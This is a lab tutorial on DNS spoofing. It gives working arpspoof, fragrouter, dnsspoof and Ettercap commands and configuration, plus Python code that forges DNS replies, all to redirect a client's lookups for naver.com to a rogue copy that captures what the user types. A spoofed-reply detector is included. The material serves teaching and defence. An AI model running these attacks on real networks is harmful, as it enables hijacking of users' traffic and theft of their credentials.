
DNS Spoofing

What is DNS Spoofing?

When a client sends a name query, the attacker answers it before the legitimate DNS server can, so the client receives an IP address of the attacker's choosing.


1. DNS weaknesses

1) DNS runs over UDP, so there is no handshake: nothing proves that a reply really came from the server the client asked.

2) The query and reply themselves are not authenticated. A stub resolver trusts any reply whose transaction ID, destination port and question match its outstanding query; plain DNS carries no signature (DNSSEC would add one, but the Windows 7 stub resolver used here does not validate).

3) An attacker on the client's local segment sees the query and can answer it faster than the real DNS server.

4) The client accepts the first matching reply to its query and discards the genuine one that arrives later.

2. DNS Spoofing attack types

1) Spoofing the client: the attacker must sniff the DNS query, because the forged reply has to carry the client's transaction ID, be sent to the client's source port and appear to come from the name server the client queried. Those values are only visible on the client's own segment, so this attack is normally run locally (here after ARP spoofing puts the attacker in the path).

2) DNS cache poisoning is the related technique in which the target is not the client but a DNS server: the forged reply is aimed at the recursive server so that its cache stores the attacker's address and every client that uses that server is misdirected until the entry expires.
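To make sections 1 and 2 concrete, here is an added example written for this page; it is not taken from the page or from the dsniff/dnsspoof source. It builds the client's A query in DNS wire format, pulls out the transaction ID and question that a sniffing attacker needs, forges a reply pointing at the rogue server, and replays the race with the checks a classic stub resolver performs. The TXID 9996, the name www.naver.com and the address 10.1.5.200 come from the lab below; 203.0.113.10 stands in for the genuine answer and is a constructed value. The IP/UDP layer (forging the name server's source address and hitting the client's source port) is left to the tool and not shown.

```python
"""Added illustration (not dnsspoof's code): build a DNS query, parse it the
way a sniffer would, forge the reply, and replay the race a stub resolver
decides by "first matching reply wins".  Standard library only."""
import socket
import struct

QTYPE_A = 1
QCLASS_IN = 1


def build_query(txid, qname, qtype=QTYPE_A):
    """Standard recursive A query: flags 0x0100 = RD set, one question."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    name = b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                    for lbl in qname.rstrip(".").split(".")) + b"\x00"
    return header + name + struct.pack(">HH", qtype, QCLASS_IN)


def _read_name(pkt, off):
    """Decode a label sequence or a compression pointer; return (name, next_off)."""
    labels = []
    while True:
        n = pkt[off]
        if n & 0xC0 == 0xC0:                      # pointer to an earlier name
            ptr = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            tail, _ = _read_name(pkt, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n


def parse_query(pkt):
    """The fields an attacker must copy: transaction ID and the question."""
    txid, flags = struct.unpack(">HH", pkt[:4])
    qname, off = _read_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"txid": txid, "flags": flags, "qname": qname, "qtype": qtype,
            "qclass": qclass, "question": pkt[12:off + 4]}


def forge_reply(query_pkt, answer_ipv4, ttl=300):
    """Answer the sniffed query with an A record for answer_ipv4.

    This is the DNS payload dnsspoof sends; the IP/UDP layer, addressed as if
    it came from the real name server, is outside this example."""
    q = parse_query(query_pkt)
    # 0x8180 = QR|RD|RA, RCODE 0; counts: 1 question, 1 answer, 0 auth, 0 add
    header = struct.pack(">HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)
    # Answer owner name is a pointer (0xC00C) to the question name at offset 12
    rr = b"\xc0\x0c" + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
    return header + q["question"] + rr + socket.inet_aton(answer_ipv4)


def answer_ip(reply_pkt):
    """Address carried by the first A record of a reply (None if not an A)."""
    _, off = _read_name(reply_pkt, 12)            # skip question name
    off += 4                                      # qtype + qclass
    _, off = _read_name(reply_pkt, off)           # answer owner name
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", reply_pkt[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        return None
    return socket.inet_ntoa(reply_pkt[off:off + 4])


def resolver_accepts(query_pkt, reply_pkt):
    """What a classic stub resolver verifies before trusting a reply: same
    TXID, QR bit set, question echoed back.  (The UDP destination port is
    matched by the kernel socket; nothing here checks who really sent it.)"""
    q = parse_query(query_pkt)
    txid, flags = struct.unpack(">HH", reply_pkt[:4])
    qlen = len(q["question"])
    return (txid == q["txid"] and bool(flags & 0x8000)
            and reply_pkt[12:12 + qlen] == q["question"])


def first_accepted_answer(query_pkt, replies_in_arrival_order):
    """Replay the race: the first reply that passes the checks is used and
    every later one, including the genuine answer, is dropped."""
    for reply in replies_in_arrival_order:
        if resolver_accepts(query_pkt, reply):
            return answer_ip(reply)
    return None


if __name__ == "__main__":
    # Constructed sample matching the dnsspoof log later on the page (TXID 9996)
    query = build_query(9996, "www.naver.com")
    spoofed = forge_reply(query, "10.1.5.200")     # rogue web server from the lab table
    genuine = forge_reply(query, "203.0.113.10")   # stand-in for the real answer (constructed)
    blind = forge_reply(build_query(1234, "www.naver.com"), "10.1.5.200")  # guessed TXID
    print("local sniffing attacker:", first_accepted_answer(query, [spoofed, genuine]))
    print("blind guess, wrong TXID:", first_accepted_answer(query, [blind, genuine]))
```

The two printed cases are the whole argument of sections 1 and 2: with the query in hand, the forged reply passes every check the client makes and wins because it arrives first; a reply with a guessed transaction ID is discarded and the genuine answer is used.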

3. DNS name query order

The client first checks its own resolver cache (which also holds the entries loaded from its hosts file) and only sends a query to its configured DNS server (8.8.8.8 in this lab) when there is no cached answer. A forged reply can only win once the cache is empty, which is why the victim's cache is flushed before the web page is opened in the steps below.


4. Attack method

Scenario: the attacker sits between the client and the gateway, receives the client's DNS query and sends back a forged DNS reply.

A copy of the site the client is trying to reach is hosted on a demo server; the client is sent to that rogue server instead of the real one and whatever the user enters there is captured.

Attack sequence

1) Port listening (sniff the client's DNS queries)

2) Forwarding (web server; also possible from BackTrack)

3) ARP spoofing

4) Create the hosts file for dnsspoof

5) dnsspoof -f <file>

GNS3 1.4.5 / 3745 / generic switch

GNS3 2.0.3 / i86bi-linux-l3-adventerprisek9-15.4.1T.bin / i86bi-linux-l2-adventerprisek9-15.2c.bin

Test environment

Role               IP               DNS       OS        Version   VMnet   Connect
WEB Client         10.1.4.1/24      8.8.8.8   WIN 7     SP1       -       -
Attacker           10.1.4.2/24      8.8.8.8   Kali      2.0       -       -
Rogue WEB Server   10.1.5.200/24    8.8.8.8   WIN 2012  R2        -       -


NAT Router

enable
hostname NAT
!
enable secret ciscosec
!
no ip domain lookup
!
username root password 0 toor
!
interface Ethernet0/1
 ip address dhcp
 ip nat outside
 no shutdown
!
interface Ethernet0/2
 ip address 10.1.4.254 255.255.255.0
 ip nat inside
 no shutdown
!
interface Ethernet0/3
 ip address 10.1.5.254 255.255.255.0
 ip nat inside
 no shutdown
!
ip nat inside source list 1 interface Ethernet0/1 overload
!
access-list 1 permit 10.1.4.0 0.0.0.255
access-list 1 permit 10.1.5.0 0.0.0.255
!
end

 

 

WEB Client

Rogue WEB Server

Kali - IP address

root@kali:~# ip addr add 10.1.4.2/24 dev eth0
root@kali:~# route add default gw 10.1.4.254

 

Kali - create the hosts file for dnsspoof

The file uses /etc/hosts syntax (address first, then the name); dnsspoof also accepts wildcards such as *.naver.com. Written here with a heredoc so it can be pasted as-is:

root@kali:~# cd /tmp
root@kali:/tmp# cat > /tmp/hosts << 'EOF'
10.1.5.200  www.naver.com
10.1.5.200  naver.com
EOF


Kali - ARP spoofing

First map the segment to confirm the client (10.1.4.1) and the gateway (10.1.4.254) are there (-Pn skips ping-based host discovery and probes every address):

root@kali:~# nmap -Pn 10.1.4.0/24

Then tell the client that the gateway's IP belongs to the attacker's MAC, so its outgoing traffic, including DNS queries, passes through Kali. Only the client-to-gateway direction is poisoned here; that is enough to see the queries, and the real replies still reach the client directly, which is why the forged reply has to arrive first:

root@kali:~# arpspoof -i eth0 -t 10.1.4.1 10.1.4.254


Kali - new terminal - run fragrouter

fragrouter -B1 forwards the intercepted packets unchanged to the real gateway, so the client keeps working while it is being spoofed (enabling net.ipv4.ip_forward would do the same):

root@kali:~# fragrouter -B1


Kali - new terminal - run dnsspoof

dnsspoof answers every query it sees for a name listed in the hosts file; queries for other names are left to the real server:

root@kali:~# dnsspoof -i eth0 -f /tmp/hosts


5. Start the Apache2 server on the attacker system (Kali) and build the fake home page

(In the lab table the rogue site runs on the WIN 2012 host at 10.1.5.200, which is where the hosts file points; if the page is served from Kali instead, the hosts file must point at 10.1.4.2.)

6. Flush the cache on the victim system

Clear the victim's DNS resolver cache (and its ARP cache) so that the next lookup really goes out on the wire and can be answered by the attacker.

7. Open the web page


Kali - dnsspoof output, each line being a query that dnsspoof answered:

 root@kali:/tmp# dnsspoof -i eth0 -f hosts
dnsspoof: listening on eth0 [udp dst port 53 and not src 10.1.4.2]
10.1.4.1.64376 > 8.8.8.8.53:  9996+ A? www.naver.com
10.1.4.1.64792 > 10.1.4.2.53:  2+ A? www.naver.com
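The log above shows the attacker answering the query; on the wire the client therefore sees two replies to one query. The following is an added example, not part of the original page and not dsniff code, of how a defender would spot that in a packet capture: it reads tcpdump -n style lines (a constructed capture using the lab's addresses, with 203.0.113.x standing in for real answers), pairs each reply with the query it belongs to, and flags a second reply carrying a different answer as well as a reply from a server the client never asked.

```python
"""Added example (not from the page or from dsniff): a detector for the race
shown in the dnsspoof log, run over tcpdump -n style lines.  Two signals are
used: a reply whose source is not the server the client asked, and two
replies to the same query that carry different answers (the spoofed one
arrives first, the genuine one a few milliseconds later).  Standard library only."""
import re

# tcpdump -n output for UDP/53 (query and reply lines); qname keeps its trailing dot
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<cip>[\d.]+)\.(?P<cport>\d+) > (?P<sip>[\d.]+)\.53: "
    r"(?P<txid>\d+)\+ A\? (?P<qname>\S+)\.")
REPLY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<sip>[\d.]+)\.53 > (?P<cip>[\d.]+)\.(?P<cport>\d+): "
    r"(?P<txid>\d+) \d+/\d+/\d+ A (?P<rdata>[\d.]+)")

UNEXPECTED_SOURCE = "reply from a server the client did not ask"
CONFLICTING_DUPLICATE = "second reply with a different answer (spoof race)"
UNSOLICITED = "reply without a matching query"


def detect_spoofed_replies(lines):
    """Pair replies with outstanding queries on (client IP, client port, TXID)
    and return a list of alert dicts in capture order."""
    pending = {}
    alerts = []
    for line in lines:
        m = QUERY_RE.match(line)
        if m:
            key = (m["cip"], m["cport"], int(m["txid"]))
            pending[key] = {"server": m["sip"], "qname": m["qname"], "answers": []}
            continue
        m = REPLY_RE.match(line)
        if not m:
            continue  # not a DNS A query/reply line; ignore
        key = (m["cip"], m["cport"], int(m["txid"]))
        state = pending.get(key)
        if state is None:
            alerts.append({"ts": m["ts"], "qname": None, "reason": UNSOLICITED,
                           "source": m["sip"], "answers": [m["rdata"]]})
            continue
        if m["sip"] != state["server"]:
            alerts.append({"ts": m["ts"], "qname": state["qname"], "reason": UNEXPECTED_SOURCE,
                           "source": m["sip"], "answers": [m["rdata"]]})
        if state["answers"] and m["rdata"] not in state["answers"]:
            alerts.append({"ts": m["ts"], "qname": state["qname"], "reason": CONFLICTING_DUPLICATE,
                           "source": m["sip"], "answers": state["answers"] + [m["rdata"]]})
        state["answers"].append(m["rdata"])
    return alerts


# Constructed capture in tcpdump -n style: the 10.1.4.1 client asks 8.8.8.8,
# dnsspoof on Kali answers first (10.1.5.200), the real answer follows ~20 ms
# later; the last exchange shows an attacker that did not bother to forge the
# source address.  203.0.113.x are documentation addresses standing in for
# real ones.
SAMPLE_CAPTURE = """\
12:00:01.000100 IP 10.1.4.1.64376 > 8.8.8.8.53: 9996+ A? www.naver.com. (31)
12:00:01.000350 IP 8.8.8.8.53 > 10.1.4.1.64376: 9996 1/0/0 A 10.1.5.200 (47)
12:00:01.021900 IP 8.8.8.8.53 > 10.1.4.1.64376: 9996 1/0/0 A 203.0.113.10 (47)
12:00:02.000100 IP 10.1.4.1.64377 > 8.8.8.8.53: 10234+ A? www.example.com. (33)
12:00:02.031000 IP 8.8.8.8.53 > 10.1.4.1.64377: 10234 1/0/0 A 203.0.113.20 (49)
12:00:03.000100 IP 10.1.4.1.64378 > 8.8.8.8.53: 777+ A? mail.naver.com. (32)
12:00:03.000400 IP 10.1.4.2.53 > 10.1.4.1.64378: 777 1/0/0 A 10.1.5.200 (48)
"""


def sample_alerts():
    """Run the detector over the constructed capture above."""
    return detect_spoofed_replies(SAMPLE_CAPTURE.splitlines())


if __name__ == "__main__":
    for a in sample_alerts():
        print(a["ts"], a["qname"], "<-", a["source"], "|", a["reason"], a["answers"])
```

The duplicate-reply check is the one that catches dnsspoof as used on this page, because the tool forges the server's source address and the genuine reply still arrives through the gateway a moment later; the unexpected-source check only fires against a less careful attacker. Feed it `tcpdump -n -l udp port 53` output from the gateway side to use it live.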

 


=============================

DNS spoofing with Ettercap

=============================

Edit /etc/ettercap/etter.conf

In the [privs] section Ettercap drops to uid/gid 65534 (nobody) after start-up. The iptables redirect commands enabled below need root, so set both to 0 (the default lines commented out, the two new lines added):

[privs]
#ec_uid = 65534                # nobody is the default
ec_uid = 0
#ec_gid = 65534                # nobody is the default
ec_gid = 0

Further down, remove the hash marks in front of the two iptables lines. They are used by Ettercap's SSL interception rather than by dns_spoof itself, but enabling them here avoids having to come back to the file:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Map the hostnames to the rogue server in /etc/ettercap/etter.dns (the wildcard line catches every other naver.com subdomain):

root@kali:~# vi /etc/ettercap/etter.dns

naver.com       A       10.1.5.200
www.naver.com   A       10.1.5.200
*.naver.com     A       10.1.5.200

 

Start Ettercap with its GTK GUI:

root@kali:~# ettercap -G


The remaining steps are done in the GUI (screenshots are not reproduced here):

1) Choose the interface to sniff on (Sniff > Unified sniffing, eth0).

2) Scan for hosts in the network (Hosts > Scan for hosts).

3) Show the scanned hosts (Hosts > Hosts list).

4) Select the client as Target 1 and the gateway as Target 2 (Add to Target 1 / Add to Target 2).

5) Start the ARP spoofing (Mitm > ARP poisoning).

6) Check the optional parameters (Sniff remote connections) and confirm.

7) Open Plugins > Manage the plugins.

8) Double-click dns_spoof to activate it.

9) On the web client (victim), check the ARP cache table: the gateway's entry now carries the attacker's MAC address.

10) Flush the victim's host cache table.

11) Connect to the naver site.

12) The faked website is displayed in place of the real one.